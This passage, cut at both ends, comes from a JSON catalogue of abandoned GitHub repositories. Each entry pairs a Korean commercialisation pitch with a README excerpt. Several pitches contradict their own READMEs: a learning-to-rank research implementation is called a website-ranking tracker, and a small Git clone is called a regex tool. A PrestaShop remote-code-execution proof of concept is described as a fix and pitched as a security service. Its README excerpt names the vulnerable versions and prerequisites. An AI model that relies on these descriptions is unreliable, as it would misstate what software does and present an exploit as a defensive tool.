scaffolding apps.\n\nUsing containers in this man","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"nschloe/stargraph","github_url":"https://github.com/nschloe/stargraph","stars":5,"language":"","license":"GPL-3.0","abandonment_months":36,"description":"# nschloe/stargraph 평가 보고서\n\n## 왜 보물인가\n깃허브의 별 수를 시각적으로 표현해주는 도구로, 오픈소스 프로젝트의 인기도 변화를 한눈에 볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자들을 위한 '프로젝트 인기도 분석 대시보드' 구독 서비스\n2. **내부 업무 도구**: 회사의 오픈소스 프로젝트들을 모니","readme_excerpt":"# GitHub trends\n\nAll graphs are updated monthly.\n\n### Programming languages\n\n![programming-languages](plots/programming-languages.svg)\n\n### Version control systems\n\n![vcs](plots/version-control-systems.svg)\n\n### Frontend frameworks\n\n![frontend-frameworks](plots/frontend-frameworks.svg)\n\n### Backend frameworks\n\n![backend-frameworks](plots/backend-frameworks.svg)\n\n### Universal-rendering frameworks\n\n![universal-rendering-frameworks](plots/universal-rendering-frameworks.svg)\n\n### Browsers\n\n![browsers](plots/browsers.svg)\n\n### Databases\n\n![databases](plots/databases.svg)\n\n### Time-series databases\n\n![time-series-databases](plots/time-series-databases.svg)\n\n### Search engines\n\n![search-engines](plots/search-engines.svg)\n\n### CSS frameworks\n\n![css-frameworks](plots/css-frameworks.svg)\n\n### Static site generators\n\n![static-site-generators](plots/static-site-generators.svg)\n\n### JavaScript\n\n##### Package managers\n\n![javascript-package-managers](plots/javascript-package-managers.svg)\n\n##### Bun","composite_score":0.5006,"license_safety_tag":"restricted"},{"name":"omidh28/clarifyjs","github_url":"https://github.com/omidh28/clarifyjs","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":103,"description":"# ClarifyJS 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 쉽게 정리하고 이해할 수 있게 만드는 도구로, 비즈니스 의사결정을 빠르게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 중소 기업의 판매·재고 데이터를 자동으로 정리해주는 월 구독형 서비스\n2. **대기업 내부 도구**: 부서별 보고서와 통계를 자동 정렬","readme_excerpt":"# clarifyJs\n\nClarifyJs allows you to easily create chained methods that can be executed in any order you want.\n\nThis feature is particularly useful when you want to make your code more friendly and declarative, For Example we have these chained methods for sending a message to a specific group of users:\n```javascript\nsend('hello everyone!').to('friends');\n```\nThis works fine with normal method chaining but what about when we want to create more complex chained methods?\nFor example we want to filter some of our friends out:\n```javascript\nsend('hello everyone!').to('friends').except('john');\n```\nNormal javascript methods are executed from left-to-right, So when we reach \"except\" filter the message has already been sent to all friends. However ClarifyJs allows to overcome this limitation by allowing to priorities methods to allow execution in any order.\n\nClarifyJs also allows controlling async methods. Suppose we want to log a message to console when the message has been sent:\n```javascri","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"MobileTipsters/Swift-Daily-Tips","github_url":"https://github.com/MobileTipsters/Swift-Daily-Tips","stars":27,"language":"","license":"MIT","abandonment_months":89,"description":"# Swift-Daily-Tips 상용화 분석\n\n## 왜 보물인가\n매일 새로운 아이폰 개발 팁을 자동으로 배워볼 수 있는 교육 콘텐츠 자산이다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 월간 구독으로 매일 한 가지씩 아이폰 앱 개발 팁을 이메일이나 앱 푸시로 전송하는 서비스\n2. **기업 교육 도구**: IT 부서에서 직원들의 아이폰 앱","readme_excerpt":"![Swift Daily Tips](/icons/sdt-logo.png)\n\n[![Patreon](https://img.shields.io/badge/patreon-donate-green.svg)](https://patreon.com/SwiftDailyTips) [![Buy me a Coffee](https://img.shields.io/badge/buy%20me%20a%20coffee-donate-green.svg)](https://buymeacoffee.com/SwiftDailyTips) [![GitHub stars](https://img.shields.io/github/stars/MobileTipsters/Swift-Daily-Tips.svg)](https://github.com/MobileTipsters/Swift-Daily-Tips/stargazers) [![GitHub forks](https://img.shields.io/github/forks/MobileTipsters/Swift-Daily-Tips.svg)](https://github.com/MobileTipsters/Swift-Daily-Tips/stargazers) [![GitHub issues](https://img.shields.io/github/issues/MobileTipsters/Swift-Daily-Tips.svg)](https://github.com/MobileTipsters/Swift-Daily-Tips/issues) [![GitHub license](https://img.shields.io/github/license/MobileTipsters/Swift-Daily-Tips.svg)](https://github.com/MobileTipsters/Swift-Daily-Tips)\n\n[![alt text][TwitterIcon]][Twitter]\n[![alt text][InstagramIcon]][Instagram]\n[![alt text][TelegramIcon]][Telegram]\n\n","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"ProgrammingHero1/book-archive","github_url":"https://github.com/ProgrammingHero1/book-archive","stars":5,"language":"","license":"unknown","abandonment_months":53,"description":"# book-archive 상업화 분석\n\n## 왜 보물인가\n책 정보를 쉽게 찾고 정리할 수 있는 도구로, 출판사·도서관·독서 커뮤니티 등 책과 관련된 모든 비즈니스의 기본 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **독서 추천 SaaS**: 사용자 독서 취향을 분석해 책을 추천해주는 구독형 서비스\n2. **도서관 관리 도구**: 학교·공공","readme_excerpt":"# book-archive\n\n## This private repo link is no longer available. If you want to work on this project, use your own public repo\n\n## API Links\n\n### Book Search\nURL Format: https://openlibrary.org/search.json?q=${searchText}\n\nExample: https://openlibrary.org/search.json?q=javascript\n\n\n### Book cover image url: Medium (Don't use the large image. Use the Medium image)\nURL Format: https://covers.openlibrary.org/b/id/{cover_i}-M.jpg\n\nExample: https://covers.openlibrary.org/b/id/554106-M.jpg\n","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"0-vortex/cf-workers-url-shortener","github_url":"https://github.com/0-vortex/cf-workers-url-shortener","stars":6,"language":"Handlebars","license":"BSD-3-Clause","abandonment_months":62,"description":"# cf-workers-url-shortener 분석\n\n## 왜 보물인가\n긴 웹주소를 짧게 줄여주는 서비스를 누구나 쉽게 만들 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 마케팅 팀이 소셜미디어 캠페인용 짧은 링크를 자동 생성하고 클릭 통계를 확인하는 플랫폼\n- **내부 업무 도구**: 회사 직원들이 긴 공유 링크를 간단하게","readme_excerpt":"# workers-url-shortener\n\n[![Commitizen Friendly](https://img.shields.io/badge/commitizen-friendly-brightgreen.svg)](http://commitizen.github.io/cz-cli/)\n [![License](https://img.shields.io/github/license/0-vortex/workers-url-shortener)](./LICENSE)\n [![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2F0-vortex%2Fworkers-url-shortener.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2F0-vortex%2Fworkers-url-shortener?ref=badge_shield)\n\n[![Maintainability](https://api.codeclimate.com/v1/badges/26ea74df7c6fe2f18438/maintainability)](https://codeclimate.com/github/0-vortex/workers-url-shortener/maintainability)\n [![Known Vulnerabilities](https://snyk.io/test/github/0-vortex/workers-url-shortener/badge.svg)](https://snyk.io/test/github/0-vortex/workers-url-shortener)\n\n## Overview\n\nA Cloudflare Workers script to use as a simple redirect system.\n\nThe [data.json](./src/data.json) file can be used as dummy input or ``git`` enabled backup for your production env","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"samchon/fake-iamport-server","github_url":"https://github.com/samchon/fake-iamport-server","stars":15,"language":"","license":"unknown","abandonment_months":33,"description":"# fake-iamport-server 분석\n\n## 왜 보물인가\n온라인 결제 시스템을 개발할 때 실제 결제 서버 없이 테스트할 수 있게 해주는 도구로, 개발자들의 업무 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 쇼핑몰, 구독 서비스 등 결제 기능이 필요한 웹 애플리케이션 개발 시 테스트 환경 제공\n2. ","readme_excerpt":"> # Notice\n>\n> 다음 주소로 이전하였습니다.\n>\n> https://github.com/samchon/payments\n","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"admin-ch/CovidCertificate-Apidoc","github_url":"https://github.com/admin-ch/CovidCertificate-Apidoc","stars":9,"language":"","license":"unknown","abandonment_months":42,"description":"# CovidCertificate-Apidoc 평가 보고서\n\n## 왜 보물인가\n코로나19 백신 인증서를 디지털로 검증하는 기술로, 전 세계 보건 기관과 정부가 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 항공사·병원·공공기관이 구독하는 백신증명서 검증 플랫폼\n2. **내부 업무 도구**: 정부·보건청의 예방접종 ","readme_excerpt":"The documentation is now consolidated in [CovidCertificate-Documents](https://github.com/admin-ch/CovidCertificate-Documents).\n\nDirect link to [API Doc](https://github.com/admin-ch/CovidCertificate-Documents/tree/main/api-doc).\n\n","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"ermongroup/pirank","github_url":"https://github.com/ermongroup/pirank","stars":7,"language":"Python","license":"MIT","abandonment_months":39,"description":"# pirank 저장소 분석\n\n## 왜 보물인가\n웹사이트 순위를 자동으로 추적하고 경쟁사 현황을 한눈에 파악할 수 있는 도구로, 마케팅 담당자들이 수동으로 하던 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 디지털 마케팅 회사들이 고객 웹사이트의 검색 순위 변동을 자동 모니터링하는 구독 서비스\n- **내부 업무 도구*","readme_excerpt":"# PiRank: Learning to Rank via Differentiable Sorting\n\nThis repository provides a reference implementation for learning PiRank-based models as described in the paper:\n\n> PiRank: Learning to Rank via Differentiable Sorting   \n> [Robin Swezey](https://www.linkedin.com/in/robin-m-e-swezey/), [Aditya Grover](https://aditya-grover.github.io), [Bruno Charron](https://scholar.google.com/citations?user=klbU-o4AAAAJ) and [Stefano Ermon](https://cs.stanford.edu/~ermon/).  \n> Paper: https://arxiv.org/abs/2012.06731\n\n## Requirements\n\nThe codebase is implemented in Python 3.7. To install the necessary base requirements, run the following commands:\n\n```\npip install -r requirements.txt\n```\n\nIf you intend to use a GPU, modify _requirements.txt_ to install _tensorflow-gpu_ instead of _tensorflow_.\n\nYou will also need the NeuralSort implementation available [here](https://github.com/ermongroup/neuralsort). Make sure it is added to your PYTHONPATH.\n\n## Datasets\n\nPiRank was tested on the two following dat","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"warrenm/Shadertweak","github_url":"https://github.com/warrenm/Shadertweak","stars":6,"language":"Objective-C","license":"MIT","abandonment_months":97,"description":"# Shadertweak 분석\n\n## 왜 보물인가\n3D 그래픽 디자이너가 복잡한 코딩 없이 실시간으로 화면 효과를 만들고 수정할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발사의 SaaS 플랫폼**: 게임팀이 실시간 셰이더(화면 효과) 편집 클라우드 서비스로 구독료 모델 운영\n2. **3D 애니메이션 스튜디오 내부 도구**: 영상 제","readme_excerpt":"# Shadertweak\n\nShadertweak is an iPad app that allows you to rapidly prototype fragment shaders in the Metal shading language.\n\n![Screenshot](screenshot.png)\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"rigo42/Crm-Laravel-Livewire","github_url":"https://github.com/rigo42/Crm-Laravel-Livewire","stars":5,"language":"Blade","license":"unknown","abandonment_months":58,"description":"# rigo42/Crm-Laravel-Livewire 분석\n\n## 왜 보물인가\n작은 회사나 개인사업자가 고객 관리를 쉽게 할 수 있는 관리 시스템을 직접 만들 수 있는 청사진입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 영업팀을 위한 클라우드 기반 고객 관리 서비스로 월간 구독료를 받고 판매\n2. **내부 업무 도구**: 중소 ","readme_excerpt":"# CRM - Laravel\n\nHola!, CRM - Laravel es un proyecto open source creado con livewire, laravel, alpine js, el cual\nte ayudará a tener un control de tus clientes.\n\n## Funcionalidades 📋\n* Dashboard general\n* Google Analytics\n* Gestión de prospectos\n* Convertir prospecto a cliente\n* Gestión de clientes\n* Envío de correo de bienvenida al cliente\n* Gestión de proveedores\n* Gestión de tipos de servicios\n* Gestión de servicios \n* Gestión de proyectos\n* Gestión de cotizaciones\n* Gestión de facturas (Adjuntar factura)\n* Gestión de pagos\n* Gestión de gastos\n* Gestión de usuarios\n* Configuraciones\n* Logs\n\n## Comenzando 🚀\n\n_Estas instrucciones te permitirán obtener una copia del proyecto en funcionamiento en tu máquina local para propósitos de desarrollo y pruebas._\n\n\n### Pre-requisitos 📋\n\n_Que cosas necesitas para instalar el software y como instalarlas_\n\n```\n1.- PHP v7.4+\n2.- Servidor XAMMP, WAMPP o Laragon\n```\n\n### Instalación 🔧\n\n_1.- Deberás de instalar las dependencias de laravel con el siguie","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"zh460045050/SNL_ICCV2021","github_url":"https://github.com/zh460045050/SNL_ICCV2021","stars":7,"language":"Python","license":"unknown","abandonment_months":51,"description":"# SNL_ICCV2021 저장소 분석\n\n## 왜 보물인가\nICCV(국제 컴퓨터 비전 학회) 2021 논문의 코드로, 이미지 인식 분야에서 최신 학술 성과를 실제로 사용할 수 있는 형태로 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 분석 SaaS**: X-ray나 MRI 이미지를 자동으로 분석하는 웹 서비스\n2. **보안 카메라 모니터링 시스","readme_excerpt":"# Spectral Nonlocal Block\n\n## Overview\nOfficial implementation of the paper: [Unifying Nonlocal Blocks for Neural Networks][paper_url] (ICCV'21)\n\n## Spectral View of Nonlocal Block\nOur work provide a novel perspective for the model design of non-local blocks called **the Spectral View of Non-local**. In this view, the non-local block can be seen as **operating a set of graph filters on a fully connected weighted graph**. Our spectral view can help to therorotivally anaylize exsiting non-local blocks and design novel non-local block with the help of graph signal processing (e.g. the graph neural networks).\n\n<center>\n<img src=\"pics/overview.png\" width=\"80%\" />\n</center>\n\n## Spectral Nonlocal Block\nThis repository gives the implementation of Spectral Nonlocal Block (SNL) that is theoreotically designed with the help of first-order chebyshev graph convolution. The structure of the SNL is given below:\n\n<center>\n<img src=\"pics/structure.png\" width=\"80%\" />\n</center>\n\nTwo main differences bet","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"ischurov/calculus-notes","github_url":"https://github.com/ischurov/calculus-notes","stars":5,"language":"Shell","license":"unknown","abandonment_months":37,"description":"# ischurov/calculus-notes 분석\n\n## 왜 보물인가\n미적분학을 체계적으로 정리한 학습 자료로, 교육 콘텐츠 시장에서 고품질 교육 자료의 부족을 채울 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼 SaaS**: 학생들이 구독하여 체계적인 미적분 강의노트에 접근하는 유료 교육 서비스\n2. **대학 내부 ","readme_excerpt":"# calculus-notes\nАвтор: Илья Щуров (НИУ ВШЭ)\n\nКонспекты лекций по курсу «Математический анализ - 1» (Совместная программа по\nэкономике НИУ ВШЭ и РЭШ).\n\nПодробнее см. на [странице курса](http://math-info.hse.ru/s20/3).\n","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"Livijn/laravel-object-detection","github_url":"https://github.com/Livijn/laravel-object-detection","stars":11,"language":"PHP","license":"MIT","abandonment_months":38,"description":"# Laravel 물체 감지 프로젝트 분석\n\n## 왜 보물인가\n사진이나 영상에서 자동으로 사물을 찾아내는 AI 기능을 누구나 쉽게 웹 서비스에 붙일 수 있도록 만들어진 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 부동산 중개 앱에서 매물 사진 자동 분석 서비스 제공\n- **내부 업무 도구**: 제조업체 품질관리팀이 불량품 자동 검출 ","readme_excerpt":"# Laravel Object Detection\n\n[![Latest Version on Packagist](https://img.shields.io/packagist/v/livijn/laravel-object-detection.svg?style=flat-square)](https://packagist.org/packages/livijn/laravel-object-detection)\n[![Total Downloads](https://img.shields.io/packagist/dt/livijn/laravel-object-detection.svg?style=flat-square)](https://packagist.org/packages/livijn/laravel-object-detection)\n\nThis package detects faces in an image using Machine Learning, [TensorFlow](https://www.tensorflow.org/) and the [MediaPipe Face Detection](https://google.github.io/mediapipe/solutions/face_detection.html) model.\n\n![Example](https://mediapipe.dev/images/mobile/face_detection_android_gpu.gif)\n\n## Installation\n\nYou can install the package via composer:\n\n```bash\ncomposer require livijn/laravel-object-detection\n```\n\nYou should add this to your `composer.json` file to ensure that our package is fully installed. \n```\n\"scripts\": {\n    \"post-install-cmd\": [\n        \"@php artisan object-detection:install\"\n    ","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"ALQO-Universe/ALQO","github_url":"https://github.com/ALQO-Universe/ALQO","stars":6,"language":"C++","license":"MIT","abandonment_months":52,"description":"# ALQO-Universe/ALQO 분석\n\n## 왜 보물인가\n암호화폐 생태계를 구축하고 관리할 수 있는 기초 플랫폼으로, 디지털 자산 사업을 시작하려는 기업들에게 필수적인 기술 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 운영**: 암호화폐를 사고팔 수 있는 웹사이트나 앱으로 직접 활용\n2. **블록체인 기반 결제 시스템**: ","readme_excerpt":"ALQO integration/staging repository\n===================================\n\nWhat is ALQO?\n-------------\n\nALQO is an experimental digital currency that enables instant payments to anyone, anywhere in the world. ALQO uses peer-to-peer technology to operate with no central authority: managing transactions and issuing money are carried out collectively by the network, using a  proof-of-stake minting system, combined with masternodes.\n\nLicense\n-------\n\nALQO is released under the terms of the MIT license. See [COPYING](COPYING) for more\ninformation or see https://opensource.org/licenses/MIT.\n\nDevelopment Process\n-------------------\n\nThe `master` branch is regularly built and tested, but is not guaranteed to be\ncompletely stable. [Tags](https://github.com/ALQOCRYPTO/ALQO/tags) are created\nregularly to indicate new official, stable release versions of ALQO.\n\nThe contribution workflow is described in [CONTRIBUTING.md](CONTRIBUTING.md)\nand useful hints for developers can be found in [doc/developer-","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"WithGJR/regit-go","github_url":"https://github.com/WithGJR/regit-go","stars":5,"language":"Go","license":"MIT","abandonment_months":58,"description":"# regit-go 저장소 분석\n\n## 왜 보물인가\nGo 언어로 만든 정규표현식(패턴 매칭) 도구로, 복잡한 텍스트 검색과 데이터 처리를 간단하게 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이메일·전화번호·주민번호 자동 검증 기능을 탑재한 데이터 정제 웹 서비스\n2. **내부 업무 도구**: 회사의 고객 정보 시스템에서","readme_excerpt":"# ReGit - A Tiny Git-compatible Git Implementation \n\nReGit is a tiny Git implementation written in Golang. It uses the same underlying file formats as Git. Therefore, all the changes made by ReGit can be checked by Git.\n\nThis project does not aim at implementing all the features of Git. It is just an experimental implementation for learning purpose.\n\n**Note**: This project is still under active development. Many of the details haven't been handled carefully. Also, it has been tested on macOS only.\n\n## Available Commands\n\n* `regit-go init`\n* `regit-go add [file names]`\n  * Ex: `regit-go add code/main.py README.md code/lib/util.py`\n* `regit-go commit -m [message]`\n  * `-m` option is required to supply.\n  * Ex: `regit-go commit -m \"init commit\"`\n* `regit-go checkout [path names]`\n  * Ex: `regit-go checkout code/main.py code/lib/util.py`\n* `regit-go branch [branch name]`\n  * Ex: `regit-go branch develop`\n* `regit-go log` \n  * It will invoke the `less` command to print the commit logs\n* `re","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"mo-xiaoxi/computer-network-security-papers-reading","github_url":"https://github.com/mo-xiaoxi/computer-network-security-papers-reading","stars":9,"language":"","license":"Apache-2.0","abandonment_months":84,"description":"# mo-xiaoxi/computer-network-security-papers-reading 평가\n\n## 왜 보물인가\n컴퓨터 네트워크 보안에 관한 학술 논문들을 한 곳에 모아 정리해놓은 자료로, 보안 공부를 시작하려는 사람들이 신뢰할 수 있는 학습 자료를 쉽게 찾을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안교육 플랫폼**: 직원들의 ","readme_excerpt":"# computer-network-security-papers-reading\n> 清华研究生课程：计算机网络安全技术 作业汇总\n>\n> 课程老师： 段老师 \n\n### 网络安全论文阅读列表：\n\n<https://github.com/m0xiaoxi/computer-network-security-papers-reading/blob/master/reading_list.md>\n\n### 阅读的论文:\n\n1. [Network Intrusion Detection: Evasion, Trafﬁc Normalization, and End-to-End Protocol Semantics](<https://github.com/m0xiaoxi/computer-network-security-papers-reading/tree/master/01week>)\n2. [Examining How the Great Firewall Discovers Hidden Circumvention Servers](<https://github.com/m0xiaoxi/computer-network-security-papers-reading/tree/master/02week>)\n3. [MitM Attack by Name Collision: Cause Analysis and Vulnerability Assessment in the New gTLD Era](<https://github.com/m0xiaoxi/computer-network-security-papers-reading/tree/master/03week>)\n4. [Deploying Cryptography in Internet-Scale Systems: A Case Study on DNSSEC](<https://github.com/m0xiaoxi/computer-network-security-papers-reading/tree/master/04week>)\n5. [When HTTPS Meets CDN: A Case of Authentication in Delegated Servi","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"farisv/PrestaShop-CVE-2018-19126","github_url":"https://github.com/farisv/PrestaShop-CVE-2018-19126","stars":6,"language":"PHP","license":"MIT","abandonment_months":91,"description":"# PrestaShop CVE-2018-19126 분석\n\n## 왜 보물인가\n전자상거래 플랫폼의 보안 취약점을 해결하는 방법을 담고 있어 수백만 개의 온라인 쇼핑몰 운영자들이 필요로 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **쇼핑몰 보안 점검 서비스**: 온라인 가게 운영자들을 대상으로 월 구독형 보안 진단 도구 판매\n2. **호스팅 회사 부가 서","readme_excerpt":"# PrestaShop Back Office Remote Code Execution (CVE-2018-19126)\n\nThis is the PoC for CVE-2018-19126, chaining multiple vulnerabilities in PrestaShop Back Office to trigger deserialization via phar to achieve remote code execution. \n\nPrerequisite:\n- PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.\n- Back Office account (logistician, translator, salesman, etc.).\n\n![](demo.gif)\n\nPrestaShop release note: http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/\n\nVulnerable package link: https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip\n\n## WARNING\n\nFOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.\n\n## Example\n\nYou need `php` with curl extension and set `phar.readonly = Off` in `php.ini` to run the exploit.\n\n```\n# Download repository\nwget https://github.com/farisv/PrestaShop-CVE-2018-19126/archive/master.zip -O PrestaShop-CVE-2018-19126.zip\nun","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"Staacks/blender-plugins","github_url":"https://github.com/Staacks/blender-plugins","stars":12,"language":"Python","license":"GPL-3.0","abandonment_months":61,"description":"# Staacks/blender-plugins 평가 보고서\n\n## 왜 보물인가\n3D 디자인 전문가들이 매일 사용하는 블렌더(Blender)라는 소프트웨어를 더 쉽고 빠르게 쓸 수 있게 해주는 추가 기능 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 3D 디자인 클라우드 플랫폼에서 이 플러그인을 기본 도구로 제공하여 사용자 편의성 향상","readme_excerpt":"# blender-plugins\nSome plugins I created for Blender.\n\nMore will be added whenever I have an interesting idea and the time and skill to implement it. Do not expect those plugins to be polished and well-maintained - they are just for fun and often for a specific one-time purpose. Still, feel free to leave issues if you encounter problems or (even better) pull-requests fixing them.\n\nAll plugins in this repository are published under the GNU GPL 3.0 license.\n\n<a href=\"https://www.buymeacoffee.com/there.oughta.be\" target=\"_blank\"><img src=\"https://cdn.buymeacoffee.com/buttons/v2/default-blue.png\" alt=\"Buy Me A Coffee\" height=\"47\" width=\"174\" ></a>\n\n## growth-image\n\nThis plugin takes an image and calculates data to describe a growth animation for the structure shown in the original image. The result is stored in a new \"growth image\" providing timestamps for each pixel as non-color data.\n\nTo install it, you only need to download the growth-image.py file and install it with the install-button","composite_score":0.5005,"license_safety_tag":"restricted"},{"name":"thoughtbot/write-yourself-a-roguelike","github_url":"https://github.com/thoughtbot/write-yourself-a-roguelike","stars":6,"language":"Ruby","license":"MIT","abandonment_months":57,"description":"# thoughtbot/write-yourself-a-roguelike 분석\n\n## 왜 보물인가\n게임 개발을 배우고 싶어 하는 초보자들을 위해 단계별로 게임을 만드는 방법을 직접 배우고 따라할 수 있는 실용적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 게임 개발 학원 SaaS**: 초보자 대상 게임 개발 강좌 플랫폼으로 이 자료를 체계적","readme_excerpt":"# Write Yourself a Roguelike\n\nYou are about to embark on a journey. This journey will be plagued with orcs,\ngnomes, algorithms, data structures, and kittens. You, valiant developer, will\nbe writing a Roguelike.\n\n## Outline\n\n- [x] Intro\n  - [x] What is a Roguelike?\n  - [x] What is NetHack?\n  - [x] Tooling\n  - [x] Why Write This Book?\n\n- [x] Creating a Character\n  - [x] The Title Screen\n  - [x] Messages\n  - [x] Roles\n  - [x] Races\n  - [x] Genders\n  - [x] Alignments\n  - [x] Generating Abilities\n\n- [ ] Creating the Dungeon\n  - [ ] Generating random rooms\n  - [ ] Generating Doors and Corridors\n  - [ ] Moving around\n  - [ ] Creating Stairwells\n  - [ ] Vision and Lighting\n  - [ ] Color\n\n- [ ] Inventory\n  - [ ] Items\n  - [ ] Burden\n  - [ ] Money and Shops\n  - [ ] Food and Hunger\n  - [ ] Unidentified Items\n\n- [ ] Combat\n  - [ ] Random Monsters\n  - [ ] Combat\n  - [ ] Magic\n\n- [ ] Wrapping up\n  - [ ] Saving and Loading\n  - [ ] Increasing Difficulty\n  - [ ] What to do next\n\n- [ ] Possible Future C","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"common-fate/iamzero","github_url":"https://github.com/common-fate/iamzero","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":39,"description":"# IAMZero 저장소 분석\n\n## 왜 보물인가\n기업의 직원 접근 권한을 자동으로 정리해주는 도구로, 보안 위험을 줄이면서 관리 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n기업 IT 관리자를 위한 클라우드 기반 권한 관리 플랫폼으로 매월 구독료 수익 창출\n\n**2. 내부 업무 도구**\n대기업 IT팀의 직원 ","readme_excerpt":"<p align=\"center\"><img src=\"https://iamzero.dev/img/logo-boxed.svg\" height=\"80\" /></p>\n\n<h1 align=\"center\">IAM Zero</h1>\n<p align=\"center\">Identity & Access Management simplified and secure.</p>\n\n<p align=\"center\">\n<a align=\"center\" href=\"https://twitter.com/intent/tweet?url=https%3A%2F%2Fiamzero.dev&text=IAM%20Zero%20simplifies%20cloud%20permissions%20for%20development%20teams\"><img src=\"https://img.shields.io/twitter/url/https/github.com/tterb/hyde.svg?style=social\" alt=\"tweet\" /></a>\n<a href=\"https://join.slack.com/t/commonfatecommunity/shared_invite/zt-q4m96ypu-_gYlRWD3k5rIsaSsqP7QMg\"><img src=\"https://img.shields.io/badge/slack-iamzero-1F72FE.svg?logo=slack\" alt=\"slack\" /></a>\n</p>\n\n<p align=\"center\">\n    <a href=\"https://iamzero.dev/docs/getting-started\">🚀 Get Started</a> |\n    <a href=\"https://iamzero.dev/docs/support\">📖 Support</a>\n</p>\n\n<a href=\"https://iamzero.dev\" alt=\"visit the IAM Zero website\">\n<img src=\"https://iamzero.dev/demo.gif\">\n</a>\n\n<br/>\n\n## What is IAM Zero?\n\nIA","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"mferral/vue-pokedex-pinia","github_url":"https://github.com/mferral/vue-pokedex-pinia","stars":5,"language":"Vue","license":"unknown","abandonment_months":58,"description":"# vue-pokedex-pinia 보물 지도\n\n## 왜 보물인가\n포켓몬 데이터를 보여주는 웹 애플리케이션으로, 현대적 웹 개발 기술의 실제 활용 예시를 담고 있는 교육용 및 포트폴리오 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 포켓몬 정보 검색 및 수집 플랫폼 - 게임 팬들이 월 구독으로 포켓몬 정보를 체계적으로 관리\n2. *","readme_excerpt":"# Pokedex\n\n![snap](https://raw.githubusercontent.com/mferral/vue-pokedex-pinia/main/public/snap.png)\n\n\n🔥 [Live Demo](https://mferral.github.io/vue-pokedex-pinia/)\n\n\nBuilded by.\n\n- Vue 3\n- 🍍 [State Management via Pinia](https://pinia.esm.dev/).\n- ⚡️ Vue 3 - born with fastness\n- ✨Magic ✨\n\n\n## Installation\n\n## Project setup\n```\nyarn install\n```\n\n### Compiles and hot-reloads for development\n```\nyarn serve\n```\n\n### Compiles and minifies for production\n```\nyarn build\n```\n\n### Lints and fixes files\n```\nyarn lint\n```\n\n## License\n\nMIT\n\n**Free Software, Hell Yeah!**\n\n","composite_score":0.5005,"license_safety_tag":"unknown"},{"name":"bollu/tiny-optimising-compiler","github_url":"https://github.com/bollu/tiny-optimising-compiler","stars":11,"language":"Haskell","license":"BSD-3-Clause","abandonment_months":82,"description":"# tiny-optimising-compiler 평가\n\n## 왜 보물인가\n프로그래밍 언어를 더 빠르고 효율적으로 만드는 핵심 기술을 배우거나 상용화할 수 있는 교육용 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 교육 플랫폼**: 컴파일러 원리를 배우는 학생/개발자들을 위한 구독 기반 강의 서비스\n2. **기업용 내부 언어 최적화 도구**:","readme_excerpt":"# A simple end-to-end compiler for an imperative programming language [![Build Status](https://travis-ci.org/bollu/tiny-optimising-compiler.svg?branch=master)](https://travis-ci.org/bollu/tiny-optimising-compiler)\n\n\nRead the docs at [`https://bollu.github.io/tiny-optimising-compiler/`](https://bollu.github.io/tiny-optimising-compiler/)\n","composite_score":0.5005,"license_safety_tag":"safe"},{"name":"kenkunz/svelte-fsm","github_url":"https://github.com/kenkunz/svelte-fsm","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":40,"description":"# svelte-fsm 코드 자산 